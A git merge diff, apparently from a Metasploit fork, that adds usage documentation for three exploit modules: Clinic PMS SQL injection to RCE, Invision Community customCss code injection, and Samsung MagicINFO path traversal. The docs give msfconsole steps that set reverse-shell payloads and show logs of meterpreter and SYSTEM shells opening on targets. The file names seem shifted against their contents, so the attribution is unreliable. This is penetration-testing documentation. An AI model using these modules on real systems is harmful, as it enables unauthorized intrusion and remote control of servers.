Merge branch 'rapid7:master' into master

Author: mariomontecatine

Gemfile.lock

@@ -310,10 +310,14 @@ GEM
       activesupport (~> 7.0)
       railties (~> 7.0)
       zeitwerk
-    metasploit-credential (6.0.14)
+    metasploit-credential (6.0.16)
+      bigdecimal
+      csv
+      drb
       metasploit-concern
       metasploit-model
       metasploit_data_models (>= 5.0.0)
+      mutex_m
       net-ssh
       pg
       railties

db/modules_metadata_base.json

@@ -0,0 +1,68 @@
+## Vulnerable Application
+Clinic Patient's Management System contains SQL injection vulnerability in login section. This module uses the vulnerability
+(CVE-2025-3096) to gain unauthorized access to the application. As lateral movement, it uses another vulnerability (CVE-2022-2297) to gain remote code execution.
+
+## Verification Steps
+
+### Vulnerable Application Installation Setup
+1. Install Clinic's Patient Management System on your web server.
+   - Download the Web Application from [here](https://www.sourcecodester.com/download-code?nid=15453&title=Clinic%27s+Patient+Management+System+in+PHP%2FPDO+Free+Source+Code)
+
+2. Start `msfconsole` and load the exploit module:
+```bash
+   msfconsole
+   use exploit/multi/http/clinic_pms_sqli_to_rce
+```
+
+3. Set the required options:
+```bash
+   set rport <port>
+   set rhost <ip>
+   set targeturi /pms
+```
+
+4. Check if the target is vulnerable:
+```bash
+   check
+```
+
+   If the target is vulnerable, you will see a message indicating that the target is susceptible to the exploit:
+```
+   [+] <IP> The target is vulnerable.
+```
+
+5. Set up the listener for the exploit:
+```bash
+   set lport <port>
+   set lhost <ip>
+```
+
+6. Launch the exploit:
+```bash
+   exploit
+```
+
+7. If successful, you will receive a PHP Meterpreter shell.
+
+## Options
+- `TARGETURI`: (Required) The base path to the Clinic Patient Management System (default: `/pms`).
+
+## Scenarios
+
+```bash
+msf6 exploit(multi/http/clinic_pms_sqli_to_rce) > exploit
+[*] Started reverse TCP handler on 192.168.168.128:4444
+[*] Logged using SQL injection..
+[*] Malicious file uploaded..
+[*] Logged out..
+[*] Logged using SQL injection..
+[*] Sending stage (40004 bytes) to 192.168.168.146
+[*] Meterpreter session 1 opened (192.168.168.128:4444 -> 192.168.168.146:52522) at 2025-05-13 13:33:52 +0200
+
+meterpreter > sysinfo
+Computer    : ubuntu
+OS          : Linux ubuntu 6.8.0-52-generic #53~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Wed Jan 15 19:18:46 UTC 2 x86_64
+Meterpreter : php/linux
+
+```
+

documentation/modules/exploit/multi/http/clinic_pms_sqli_to_rce.md

@@ -0,0 +1,134 @@
+## Vulnerable Application
+
+This Metasploit module exploits a remote-code injection in Invision Community ≤ 5.0.6 via the **theme editor**’s `customCss` endpoint:
+
+* **CVE-2025-47916**: malformed `{expression="…"}` allows evaluation of arbitrary PHP expressions in the `content` parameter.
+
+### To replicate a vulnerable environment
+
+1. **Download the pre-built Docker lab** (includes `Dockerfile`, `docker-compose.yml` and the IPS 5.0.6 application):
+
+```bash
+wget https://archive.org/download/ips-5.0.6/IPS-5.0.6.zip -O ips_5.0.6_lab.zip
+mkdir ips_5.0.6_lab_dir
+unzip ips_5.0.6_lab.zip -d ips_5.0.6_lab_dir
+cd ips_5.0.6_lab_dir
+```
+
+2. **Bring up the stack**:
+
+```bash
+docker-compose up -d
+```
+
+3. **Complete the installer** by browsing to [http://localhost:7777](http://localhost:7777).
+
+   * You do **not** need a valid license key; you can enter any text and proceed.
+   * Use database host `db`, user `ipsuser`, password `ipspass`, database `ipsdb`.
+
+## Verification Steps
+
+1. **Check the installed version**:
+
+```bash
+curl -s http://localhost:7777/admin/install/eula.txt | head -n5
+```
+
+Expected output:
+
+```
+=============================[NOTE]=============================
+ Buy license at https://invisioncommunity.com/buy/self-hosted/
+================================================================
+ IPS 5.0.6 (5000074)
+=============================[NOTE]=============================
+```
+
+2. **In `msfconsole`**, confirm the module’s `check` returns vulnerable:
+
+```bash
+use exploit/multi/http/invision_customcss_rce
+set RHOSTS 127.0.0.1
+set TARGETURI /
+check
+```
+
+## Options
+
+No option
+
+## Scenarios
+
+### PHP Meterpreter (in-memory)
+
+```bash
+use exploit/multi/http/invision_customcss_rce
+set TARGET 0
+set RHOSTS 127.0.0.1
+set TARGETURI /
+set PAYLOAD php/meterpreter/reverse_tcp
+set LHOST 192.168.1.10
+set LPORT 4444
+run
+```
+
+### Command Shell (ARCH_CMD)
+
+```bash
+use exploit/multi/http/invision_customcss_rce
+set TARGET 1
+set RHOSTS 127.0.0.1
+set TARGETURI /
+set payload cmd/linux/http/x64/meterpreter_reverse_tcp
+set LHOST 192.168.1.10
+set LPORT 4444
+run
+```
+
+## Expected Results
+
+With `php/meterpreter/reverse_tcp`:
+
+```plaintext
+msf6 exploit(multi/http/invision_customcss_rce) > run http://localhost:7777
+[*] Exploiting target 127.0.0.1
+[*] Started reverse TCP handler on 192.168.1.36:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Detected IPS version: 5.0.6
+[+] The target is vulnerable. IPS version 5.0.6 is vulnerable (≤ 5.0.6)
+[*] Sending exploit to 127.0.0.1:7777 ...
+[*] Sending stage (40004 bytes) to 172.30.0.3
+[*] Meterpreter session 9 opened (192.168.1.36:4444 -> 172.30.0.3:34414) at 2025-05-20 18:13:55 +0200
+[*] Session 9 created in the background.
+msf6 exploit(multi/http/invision_customcss_rce) > sessions 9
+[*] Starting interaction with 9...
+
+meterpreter > sysinfo
+Computer    : 01ed59644450
+OS          : Linux 01ed59644450 6.14.6-2-cachyos #1 SMP PREEMPT_DYNAMIC Sat, 10 May 2025 20:09:10 +0000 x86_64
+Meterpreter : php/linux
+```
+
+With `cmd/linux/http/x64/meterpreter_reverse_tcp`:
+
+```plaintext
+msf6 exploit(multi/http/invision_customcss_rce) > run http://localhost:7777
+[*] Exploiting target 127.0.0.1
+[*] Started reverse TCP handler on 192.168.1.36:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Detected IPS version: 5.0.6
+[+] The target is vulnerable. IPS version 5.0.6 is vulnerable (≤ 5.0.6)
+[*] Sending exploit to 127.0.0.1:7777 ...
+[*] Meterpreter session 7 opened (192.168.1.36:4444 -> 172.30.0.3:46552) at 2025-05-20 18:11:35 +0200
+[*] Session 7 created in the background.
+msf6 exploit(multi/http/invision_customcss_rce) > sessions 7
+[*] Starting interaction with 7...
+
+meterpreter > sysinfo
+Computer     : 172.30.0.3
+OS           : Debian 12.10 (Linux 6.14.6-2-cachyos)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```

documentation/modules/exploit/multi/http/invision_customcss_rce.md

@@ -0,0 +1,72 @@
+## Vulnerable Application
+
+**Vulnerability Description**
+
+This module exploits a path traversal vulnerability in Samsung MagicINFO 9 <= 21.1050.0 (CVE-2024-7399).
+
+Remote code execution can be obtained by exploiting the path traversal vulnerability (CVE-2024-7399) in the SWUpdateFileUploader servlet,
+which can be queried by an unauthenticated user to upload a JSP shell.
+By default, the application listens on TCP ports 7001 (HTTP) and 7002 (HTTPS) on all network interfaces and runs in the context of NT
+AUTHORITY\SYSTEM.
+
+**Vulnerable Application Installation**
+
+A trial version of the software can be obtained from [the vendor]
+(https://www.samsung.com/us/business/solutions/digital-signage-solutions/magicinfo/).
+
+**Successfully tested on**
+
+- MagicINFO 9 21.1040.2 on Windows 10 (22H2)
+
+## Verification Steps
+
+1. Install Postgres or MySQL
+2. Install the application
+3. Activate the license
+4. Start `msfconsole` and run the following commands:
+
+```
+msf6 > use exploit/windows/http/magicinfo_traversal 
+msf6 exploit(windows/http/magicinfo_traversal) > set RHOSTS <IP>
+msf6 exploit(windows/http/magicinfo_traversal) > exploit 
+```
+
+You should get a shell in the context of `NY AUTHORITY\SYSTEM`.
+
+## Options
+
+### DEPTH
+The traversal depth. The FILE path will be prepended with ../ * DEPTH.
+
+## Scenarios
+
+Running the exploit against MagicINFO 9 21.1040.2 on Windows 10 should result in an output similar to the
+following:
+
+```
+msf6 exploit(windows/http/magicinfo_traversal) > exploit 
+
+[*] Started reverse TCP handler on 192.168.137.204:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] MagicINFO version detected: MagicINFO 9 Server 21.1040.2
+[+] The target appears to be vulnerable.
+[*] Uploading payload...
+[*] Upload successful
+[*] Payload executed!
+[*] Command shell session 3 opened (192.168.137.204:4444 -> 192.168.137.230:50038) at 2025-05-14 17:36:47 -0400
+
+
+Shell Banner:
+Microsoft Windows [Version 10.0.19045.3208]
+(c) Microsoft Corporation. All rights reserved.
+
+C:\MagicInfo Premium\tomcat\bin>
+-----
+          
+
+C:\MagicInfo Premium\tomcat\bin>whoami
+whoami
+nt authority\system
+
+C:\MagicInfo Premium\tomcat\bin>
+```